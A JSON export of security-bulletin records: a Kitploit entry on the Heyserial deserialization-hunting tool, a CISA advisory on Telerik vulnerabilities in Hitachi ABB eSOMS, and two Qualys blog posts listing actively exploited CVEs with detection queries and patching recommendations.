Deserialization in .NET Framework Methods and Classes\" ) \u2013 Soroush Dalili (2018)\n * [Friday the 13th, JSON Attacks](<https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf> \"Friday the 13th, JSON Attacks\" ) \u2013 Alvaro Mu\u00f1oz and Oleksandr Mirosh (2017)\n * [Exploiting .NET Managed DCOM](<https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html> \"Exploiting .NET Managed DCOM\" ) \u2013 James Forshaw, Project Zero (2017)\n * [Java Unmarshaller Security](<https://github.com/frohoff/marshalsec/blob/master/marshalsec.pdf> \"Java Unmarshaller Security\" ) \u2013 Moritz Bechler (2017)\n * [Deserialize My Shorts](<https://www.slideshare.net/frohoff1/deserialize-my-shorts-or-how-i-learned-to-start-worrying-and-hate-java-object-deserialization> \"Deserialize My Shorts\" ) \u2013 Chris Frohoff (2016)\n * [Pwning Your Java Messaging with Deserialization Vulnerabilities](<https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities-wp.pdf> \"Pwning Your Java Messaging with Deserialization Vulnerabilities\" ) \u2013 Matthias Kaiser (2016)\n * [Journey from JNDI/LDAP ](<https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf> \"Journey from JNDI/LDAP\" )[Manipulation](<https://www.kitploit.com/search/label/Manipulation> \"Manipulation\" ) to [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) Dream Land \u2013 Alvaro Mu\u00f1oz and Oleksandr Mirosh (2016)\n * [Marshalling Pickles](<https://www.youtube.com/watch?v=KSA7vUkXGSg> \"Marshalling Pickles\" ) \u2013 Chris Frohoff and Gabriel Lawrence (2015)\n * [Are you my Type? Breaking .NET Through Serialization](<https://github.com/VulnerableGhost/.Net-Sterilized--Deserialization-Exploitation/blob/master/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf> \"Are you my Type? 
Breaking .NET Through Serialization\" ) \u2013 James Forshaw (2012)\n * [A Spirited Peek into ViewState](<https://deadliestwebattacks.com/2011/05/13/a-spirited-peek-into-viewstate-part-i/> \"A Spirited Peek into ViewState\" ) \u2013 Mike Shema (2011)\n\n \n\n\n**Author:** Alyssa Rahman @ramen0x3f\n\n**Created:** 2021-10-27\n\n**Last Updated:** 2021-12-02\n\n**Blog:** <https://www.mandiant.com/resources/hunting-deserialization-exploits>\n\nFor more details on this tool and the research process behind it, check out [our blog](<https://www.mandiant.com/resources/hunting-deserialization-exploits> \"our blog\" )!\n\n \n \n\n\n**[Download Heyserial](<https://github.com/mandiant/heyserial> \"Download Heyserial\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-12T21:30:00", "type": "kitploit", "title": "Heyserial - Programmatically Create Hunting Rules For Deserialization Exploitation With Multiple Keywords, Gadget Chains, Object Types, Encodings, And Rule Types", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299", "CVE-2019-18211", "CVE-2019-18935", "CVE-2020-10189", 
"CVE-2020-36239", "CVE-2021-42321", "CVE-2021-44228"], "modified": "2022-05-12T21:30:00", "id": "KITPLOIT:1207079539580982634", "href": "http://www.kitploit.com/2022/05/heyserial-programmatically-create.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2022-04-26T21:45:47", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor:** Hitachi ABB Power Grids\n * **Equipment:** eSOMS Telerik\n * **Vulnerabilities:** Path Traversal, Deserialization of Untrusted Data, Improper Input Validation, Inadequate Encryption Strength, Insufficiently Protected Credentials, Path Traversal\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could allow an attacker to upload malicious files to the server, discover sensitive information, or execute arbitrary code.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nHitachi ABB Power Grids reports the vulnerabilities affect the following eSOMS products: \n\n * eSOMS, all versions prior to 6.3 using a version of Telerik software \n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [PATH TRAVERSAL CWE-22](<https://cwe.mitre.org/data/definitions/22.html>)\n\nPath traversal in RadChart in Telerik UI for ASP.NET AJAX allows a remote attacker to read and delete an image with extension .BMP, .EXIF, .GIF, .ICON, .JPEG, .PNG, .TIFF, or .WMF on the server through a specially crafted request. \n\n[CVE-2019-19790](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19790>) has been assigned to this vulnerability. 
A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.2 [DESERIALIZATION OF UNTRUSTED DATA CWE-502](<https://cwe.mitre.org/data/definitions/502.html>)\n\nProgress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known. \n\n[CVE-2019-18935](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18935>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.3 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nProgress Telerik UI for ASP.NET AJAX before R2 2017 SP2 does not properly restrict user input to RadAsyncUpload, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code. \n\n[CVE-2017-11357](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11357>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.4 [INADEQUATE ENCRYPTION STRENGTH CWE-326](<https://cwe.mitre.org/data/definitions/326.html>)\n\nTelerik.Web.UI in Progress Telerik UI for ASP.NET AJAX before R1 2017 and R2 before R2 2017 SP2 uses weak RadAsyncUpload encryption, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code. \n\n[CVE-2017-11317](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11317>) has been assigned to this vulnerability. 
A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.5 [INSUFFICIENTLY PROTECTED CREDENTIALS CWE-522](<https://cwe.mitre.org/data/definitions/522.html>)\n\nTelerik.Web.UI.dll in Progress Telerik UI for ASP.NET AJAX before R2 2017 SP1 and Sitefinity before 10.0.6412.0 does not properly protect Telerik.Web.UI.DialogParametersEncryptionKey or the MachineKey, which makes it easier for remote attackers to defeat cryptographic protection mechanisms, leading to a MachineKey leak, arbitrary file uploads or downloads, XSS, or ASP.NET ViewState compromise. \n\n[CVE-2017-9248](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9248>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.6 [PATH TRAVERSAL CWE-22](<https://cwe.mitre.org/data/definitions/22.html>)\n\nAbsolute path traversal vulnerability in the RadAsyncUpload control in the RadControls in Telerik UI for ASP.NET AJAX before Q3 2012 SP2 allows remote attackers to write to arbitrary files, and consequently execute arbitrary code, via a full pathname in the UploadID metadata value. \n\n[CVE-2014-2217](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2217>) has been assigned to this vulnerability. 
A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N>)). Note that this vector credits only an integrity impact even though the flaw allows arbitrary file writes and, consequently, code execution; prioritize it alongside the 9.8-rated issues rather than by score alone.\n\n#### 3.2.7 [CROSS-SITE SCRIPTING CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\nCross-site scripting (XSS) vulnerability in Telerik UI for ASP.NET AJAX RadEditor control 2014.1.403.35, 2009.3.1208.20, and other versions allows remote attackers to inject arbitrary web script or HTML via CSS expressions in style attributes. \n\n[CVE-2014-4958](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4958>) has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Energy\n * **COUNTRIES/AREAS DEPLOYED:** Worldwide\n * **COMPANY HEADQUARTERS LOCATION:** Switzerland\n\n### 3.4 RESEARCHER\n\nHitachi ABB Power Grids reported these vulnerabilities to CISA.\n\n## 4\\. MITIGATIONS\n\nHitachi ABB Power Grids has published an [advisory for eSOMS Telerik](<https://search.abb.com/library/Download.aspx?DocumentID=9AKK107991A8943&LanguageCode=en&DocumentPartId=&Action=Launch>) and advises users to update to eSOMS Version 6.3 as soon as possible. Because the RadAsyncUpload deserialization and upload flaws (CVE-2019-18935 and the related RadAsyncUpload issues above) can be used by anyone who holds the relevant encryption keys, and CVE-2017-9248 can disclose Telerik.Web.UI.DialogParametersEncryptionKey and the ASP.NET MachineKey, operators should also rotate those keys after updating and review web server logs for earlier abuse of the RadAsyncUpload control; a key disclosed before the update is not invalidated by the patch. \n\nFor additional information and support, contact a product provider or Hitachi ABB Power Grids service organization. For contact information, visit [Hitachi ABB Power Grids contact-centers](<https://www.hitachiabb-powergrids.com/contact-us/>).\n\nRecommended security practices and firewall configurations can help protect a process control network from attacks that originate from outside the network. 
Such practices include ensuring applications and servers are physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, are separated from other networks by means of a firewall system that has a minimal number of ports exposed, and others that must be evaluated case by case. Sensitive application servers should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system.\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://us-cert.cisa.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://us-cert.cisa.gov/ics/tips/ICS-TIP-12-146-01B>). 
\n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities as packaged in eSOMS. Note, however, that public proof-of-concept exploit code and scanners exist for the underlying Telerik deserialization flaw (CVE-2019-18935), and the NSA has listed that CVE among vulnerabilities exploited by state-sponsored actors; an Internet-reachable eSOMS instance on an affected Telerik build should therefore be treated as an active target and checked for prior compromise, not only patched.\n\n## Contact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsa-21-077-03>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-18T00:00:00", "type": "ics", "title": "Hitachi ABB Power Grids eSOMS Telerik", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 
"baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2217", "CVE-2014-4958", "CVE-2017-11317", "CVE-2017-11357", "CVE-2017-9248", "CVE-2019-18935", "CVE-2019-19790"], "modified": "2021-03-18T00:00:00", "id": "ICSA-21-077-03", "href": "https://www.us-cert.gov/ics/advisories/icsa-21-077-03", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2020-10-23T16:02:16", "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.\n\n"Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and \nmitigation efforts," said the NSA advisory. It also recommended "critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage."\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. 
CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) notifying about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information. \n\nHere is a list of 25 publicly known vulnerabilities (CVEs) published by the NSA, along affected products and associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller \nCitrix Gateway \nCitrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193 \nCVE-2020-8195 \nCVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 \nCitrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core & Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Multiple Microsoft Exchange Server| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 \nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET 
AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\n * \n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for "Active Attack" RTI:\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability.\n\n\n\nWith VMDR Dashboard, you can track 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. 
With trending enabled for dashboard widgets, you can keep track of these vulnerabilities' trends in your environment using the ["NSA's Top 25 Vulnerabilities from China" dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n\n\n### **Recommendations**\n\nAs guided by CISA, one must do the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * An organization's vigilance team should watch closely for indicators of compromise (IOCs) and maintain strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect and patch the high-priority commonly exploited vulnerabilities.\n\n### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "cvss3": {}, "published": "2020-10-22T23:10:29", "type": "qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", 
"CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-02T20:34:35", "description": "On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [cybersecurity advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>) detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.\n\nThe advisory states, \u201cIf an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems).\u201d\n\nCISA released the advisory in conjunction with the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. 
Federal Bureau of Investigation (FBI).\n\nThe CISA advisory is similar in scope to the October 2020 United States National Security Agency (NSA) [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) listing the top 25 known vulnerabilities being actively used by Chinese state-sponsored cyber actors [that security teams can detect and mitigate or remediate](<https://blog.qualys.com/product-tech/2020/10/22/nsa-alert-chinese-state-sponsored-actors-exploit-known-vulnerabilities>) in their infrastructure using Qualys VMDR.\n\n### Top Routinely Exploited Vulnerabilities\n\nHere is the list of top routinely exploited vulnerabilities in 2020 and 2021 along with affected products and associated Qualys VMDR QID(s) for each vulnerability.\n\n**CVE-IDs**| **Affected Products**| **Qualys Detections (QIDs)** \n---|---|--- \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| Microsoft Exchange| 50107, 50108 \nCVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900| Pulse Secure| 38838 \nCVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104| Accellion| 38830 \nCVE-2021-21985| VMware| 730102, 216261, 216260, 216259 \nCVE-2018-13379, CVE-2020-12812, CVE-2019-5591| Fortinet| 43702, 43769, 43825 \nCVE-2019-19781| Citrix| 150273, 372305, 372685 \nCVE-2019-11510| Pulse| 38771 \nCVE-2018-13379| Fortinet| 43702 \nCVE-2020-5902| F5- Big IP| 38791, 373106 \nCVE-2020-15505| MobileIron| 13998 \nCVE-2017-11882| Microsoft| 110308 \nCVE-2019-11580| Atlassian| 13525 \nCVE-2018-7600| Drupal| 371954, 150218, 277288, 176337, 11942 \nCVE-2019-18935| Telerik| 150299, 372327 \nCVE-2019-0604| Microsoft| 110330 \nCVE-2020-0787| Microsoft| 91609 \nCVE-2020-1472| Netlogon| 91688 \n \n### Detect CISA\u2019s Top Routinely Exploited Vulnerabilities using Qualys VMDR\n\nQualys released several remote and authenticated detections (QIDs) for the vulnerabilities. 
You can search for these QIDs in VMDR Dashboard using the following QQL query:\n\n`vulnerabilities.vulnerability.cveIds: [CVE-2021-26855,CVE-2021-26857,CVE-2021-26858,CVE-2021-27065,CVE-2021-22893,CVE-2021-22894,CVE-2021-22899,CVE-2021-22900,CVE-2021-27101,CVE-2021-27102,CVE-2021-27103,CVE-2021-27104,CVE-2021-21985,CVE-2018-13379,CVE-2020-12812,CVE-2019-5591,CVE-2019-19781,CVE-2019-11510,CVE-2018-13379,CVE-2020-5902,CVE-2020-15505,CVE-2017-11882,CVE-2019-11580,CVE-2019-18935,CVE-2019-0604,CVE-2020-0787,CVE-2020-1472]`\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize these vulnerabilities for \u201cActive Attack\u201d RTI:\n\n\n\nWith VMDR Dashboard, you can track the top 30 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities\u2019 trends in your environment using the [\u201cCISA: Alert (AA21-209A) | Top Exploited\u201d dashboard](<https://success.qualys.com/support/s/article/000006738>).\n\n\n\n### Recommendations\n\nAs guided by CISA, one must do the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Organizations\u2019 vigilance teams should watch closely for indicators of compromise (IOCs) and maintain strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n * Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n * Focus cyber defense resources on patching those vulnerabilities that cyber actors most often use.\n\n### Remediation and Mitigation\n\n * Patch systems and equipment promptly and diligently.\n * 
Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [_Qualys VMDR trial_](<https://www.qualys.com/subscriptions/vmdr/>) to automatically detect and mitigate or remediate the CISA top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T00:20:27", "type": "qualysblog", "title": "CISA Alert: Top Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-5591", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", 
"CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T00:20:27", "id": "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}